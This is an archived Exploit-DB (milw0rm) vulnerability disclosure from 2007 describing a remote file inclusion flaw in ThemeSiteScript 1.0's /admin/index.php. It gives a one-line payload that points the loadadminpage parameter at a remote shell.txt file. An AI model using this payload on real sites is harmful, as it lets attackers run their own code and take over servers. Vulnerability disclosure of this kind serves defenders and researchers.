ThemeSiteScript 1.0 (index.php loadadminpage) RFI Vulnerability



EDB-ID: 4780 CVE: N/A OSVDB-ID: N/A
Author: Koller Published: 2007-12-24 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : ThemeSiteScript 1.0
# GoogLe Dork      : none
# Of. site         : http://agaresmedia.com
# The price        : $32.99
# Risk             : Medium
# Found By         : Koller
# Thanks           : all members xaker.name & grabberz.com
# Vulnerable files : /admin/index.php

# Vuln : www.victim.com/admin/index.php?loadadminpage=http://localhost/shell.txt?

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-24]